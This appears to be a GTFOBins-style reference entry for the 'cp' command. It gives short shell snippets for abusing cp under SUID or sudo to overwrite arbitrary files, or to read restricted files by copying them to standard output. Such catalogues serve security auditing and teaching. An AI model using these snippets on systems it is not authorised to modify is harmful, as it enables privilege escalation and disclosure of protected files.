--- description: This can be used to copy and then read or write files from a restricted file systems or with elevated privileges. functions: suid: - code: | LFILE=file_to_write TF=$(mktemp) echo "DATA" > $TF ./cp $TF $LFILE sudo: - code: | LFILE=file_to_write TF=$(mktemp) echo "DATA" > $TF sudo cp $TF $LFILE file-read: - description: It reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system. The path must be absolute. code: | LFILE=file_to_read cp "$LFILE" /dev/stdout ---